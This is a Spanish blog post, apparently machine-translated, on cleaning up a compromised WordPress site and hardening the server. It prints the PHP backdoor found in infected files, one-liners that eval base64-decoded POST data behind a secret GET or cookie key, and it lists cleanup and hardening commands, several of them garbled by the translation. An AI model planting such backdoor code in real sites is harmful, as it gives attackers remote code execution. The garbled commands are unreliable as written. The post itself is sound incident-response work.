WordPress Exploit - limpieza de los archivos comprometidos, y la seguridad de SQL Server.

Antes de leer este post, usted debe ver , Para entender algo. :)

Hemos encontrado en varios de los blogs en archivos stealthsettings.com, similar a la siguiente código virusarii surgen de la WordPress explotar.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); salida; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); salida; }?>

xmlrpcSi está por encima de archivo xmlrpc.php de la soñolientoPero en un grep servidor, se puede ver que hay un buen número de este tipo en el código fuente.

pppffiuuu

Limpieza de archivos infectados:

Ooookkkk ...
1. La mejor solución, después de que tuvo copia de seguridadY limpiar la base de datos es limpiar archivos WordPress (puede mantener wp-config.php y los archivos que no están estrictamente en la plataforma wp después de que se verifiquen cuidadosamente) en el servidor y cargarlos a la versión original 2.5.1 (Durante este WP hacer una versión de actualización :)) http://wordpress.org/download/ . Limpie incluyendo archivos de tema si usted no confía en que su comprobación cuidadosa.

Parece que se han visto afectadas y los archivos de los temas que no han sido usados ​​antes en el blog y simplemente cambiando el tema, no resuelve el problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); salida; }?> <? php get_header (); ?>

2. Busque y elimine todos los archivos que contengan: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg y el archivo wp-info.txt, si los hubiere....

Buscar. -Name "* _new.php"
Buscar. -Name "* _old.php"
Buscar. -Name "*. Jpgg"
Buscar. -Name "* _giff"
Buscar. -Name "* _pngg"
Buscar. -Nombre "wp-info.txt"

3. en / Tmp , Buscar y borrar carpetas como tmpYwbzT2

SQL limpieza :

1. En la tabla Tabla wp_options ver si es borrar las líneas: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. También en wp_options, vaya a active_plugins y eliminar si hay un plugin que termina en una de las extensiones * _new.php, _old.php *, *. jpgg, *. giff, *. pngg o si se sospecha de otra extensión, marque con cuidado.

3. En la Tabla wp_users, A ver si hay un usuario que no ha escrito nada en su derecho, la columna user_nicename. Eliminar este usuario, pero tenga en cuenta el número en la columna ID. Este usuario puede utilizar "WordPress" como user_login y parece que se creará en 00: 00: 00 0000-00-00.

4. Ir a la tabla wp_usermeta y eliminar todas las líneas pertenecientes Identificación arriba.

Después de haber hecho esta limpieza sql, deshabilitar y habilitar algún plugin. (En el blog -> Panel de control -> Plugins)

Servidor seguro:

1. Vea lo que los directorios y archivos son "escritura"(Chmod 777) y tratar de poner en ellos una chmod que no permitiría que su escritura en cualquier nivel. (644 chmod, por ejemplo)

Buscar. -Perm-2-ls

2. Ver qué archivos tienen el bit suid o sgid . Si usted no usa esos archivos pusieron sobre ellos chmod 0 o desinstalar el paquete que lo contiene. Son muy peligrosos, porque los privilegios de ejecución "cabeza de"O"raíz"Y no con privilegios de usuario normal para ejecutar ese archivo.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Compruebe qué puertos están abiertos y tratar de cerrar o proteger a los que no se utilizan.

netstat-an | grep-i escuchar

Acerca de él. Veo Google Search y otros dicen "Bien hecho!". Pues bien que has hecho ... pero ¿qué pasa si Google empieza a prohibir todos los sitios formando ES SPAM y poner troyanos (Trojan.Clicker.HTML) en las galletas?

WordPress Exploit - limpieza de los archivos comprometidos, y la seguridad de SQL Server.

Sobre el Autor

Sigilo

Apasionado por todo lo que significa gadget y TI, escribo con gusto en stealthsettings.com de 2006 y me encanta descubrir cosas nuevas sobre computadoras y macOS, sistemas operativos Linux, Windows, iOS y Android.

Agregar un comentario!

Deja un comentario